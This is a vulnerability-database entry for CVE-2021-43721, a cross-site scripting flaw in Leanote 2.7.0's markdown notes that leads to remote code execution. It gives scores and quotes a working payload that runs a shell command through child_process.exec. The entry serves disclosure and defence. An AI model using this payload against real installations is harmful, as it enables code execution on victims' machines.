CVEDB API

Vulnerabilities

By Date
Known Exploited
Advanced Search

Vulnerable Software

Vendors
Products

Leanote: >> Leanote >> 2.7.0 Security Vulnerabilities

CVE-2021-43721

Leanote 2.7.0 is vulnerable to Cross Site Scripting (XSS) in the markdown type note. This leads to remote code execution with payload : <video src=x onerror=(function(){require('child_process').exec('calc');})();>

CVSS Score

6.1

EPSS Score

0.004

Published

2022-03-28

Page 1

Vulnerabilities

Vulnerable Software

Leanote: >> Leanote >> 2.7.0 Security Vulnerabilities

Products

Pricing

Contact Us